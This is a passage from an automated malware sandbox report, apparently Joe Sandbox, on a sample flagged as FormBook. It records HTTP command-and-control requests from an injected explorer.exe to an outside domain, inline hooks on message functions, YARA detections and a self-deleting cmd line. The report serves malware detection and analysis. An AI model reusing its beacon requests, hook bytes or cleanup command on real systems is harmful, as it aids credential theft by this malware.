                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        1192.168.2.449763154.214.84.11780C:\Windows\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        Jun 10, 2021 17:55:36.817979097 CEST5396OUTGET /n8ud/?hL=xx0OFN/A1LQZVCJMLzEbxnX8OnCdv1d2voKBm1sodMz7PL+00tIAVi4krCco92VzLf77&vPE=5jrT8R0 HTTP/1.1
                                        Host: www.didyouswipe.com
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:
                                        Jun 10, 2021 17:55:37.097047091 CEST5396INHTTP/1.1 403 Forbidden
                                        Server: nginx
                                        Date: Thu, 10 Jun 2021 15:55:37 GMT
                                        Content-Type: text/html
                                        Content-Length: 146
                                        Connection: close
                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                        Code Manipulations

                                        User Modules

                                        Hook Summary

                                        Function NameHook TypeActive in Processes
                                        PeekMessageAINLINEexplorer.exe
                                        PeekMessageWINLINEexplorer.exe
                                        GetMessageWINLINEexplorer.exe
                                        GetMessageAINLINEexplorer.exe

                                        Processes

                                        Process: explorer.exe, Module: user32.dll
                                        Function NameHook TypeNew Data
                                        PeekMessageAINLINE0x48 0x8B 0xB8 0x81 0x1E 0xE7
                                        PeekMessageWINLINE0x48 0x8B 0xB8 0x89 0x9E 0xE7
                                        GetMessageWINLINE0x48 0x8B 0xB8 0x89 0x9E 0xE7
                                        GetMessageAINLINE0x48 0x8B 0xB8 0x81 0x1E 0xE7

                                        Statistics

                                        Behavior

                                        Click to jump to process

                                        System Behavior

                                        General

                                        Start time:17:54:10
                                        Start date:10/06/2021
                                        Path:C:\Users\user\Desktop\GiG35Rwmz6.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Users\user\Desktop\GiG35Rwmz6.exe'
                                        Imagebase:0x3c0000
                                        File size:1116672 bytes
                                        MD5 hash:B0901D0A6B90E6B371BA80E2C31ADE52
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET
                                        Yara matches:
                                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.676146629.00000000028C1000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.676742229.00000000040C9000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.676742229.00000000040C9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.676742229.00000000040C9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:low

                                        General

                                        Start time:17:54:15
                                        Start date:10/06/2021
                                        Path:C:\Users\user\Desktop\GiG35Rwmz6.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Users\user\Desktop\GiG35Rwmz6.exe
                                        Imagebase:0x430000
                                        File size:1116672 bytes
                                        MD5 hash:B0901D0A6B90E6B371BA80E2C31ADE52
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.729070321.0000000000B00000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.729070321.0000000000B00000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.729070321.0000000000B00000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.728648868.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.728648868.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.728648868.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.729033636.0000000000AD0000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.729033636.0000000000AD0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.729033636.0000000000AD0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.671897283.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.671897283.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.671897283.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:low

                                        General

                                        Start time:17:54:18
                                        Start date:10/06/2021
                                        Path:C:\Windows\explorer.exe
                                        Wow64 process (32bit):false
                                        Commandline:
                                        Imagebase:0x7ff6fee60000
                                        File size:3933184 bytes
                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Start time:17:54:39
                                        Start date:10/06/2021
                                        Path:C:\Windows\SysWOW64\help.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\help.exe
                                        Imagebase:0x50000
                                        File size:10240 bytes
                                        MD5 hash:09A715036F14D3632AD03B52D1DA6BFF
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.925821980.0000000002410000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.925821980.0000000002410000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.925821980.0000000002410000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.925566371.00000000000D0000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.925566371.00000000000D0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.925566371.00000000000D0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:moderate

                                        General

                                        Start time:17:54:43
                                        Start date:10/06/2021
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:/c del 'C:\Users\user\Desktop\GiG35Rwmz6.exe'
                                        Imagebase:0x11d0000
                                        File size:232960 bytes
                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Start time:17:54:44
                                        Start date:10/06/2021
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff724c50000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Disassembly

                                        Code Analysis

                                        Reset < >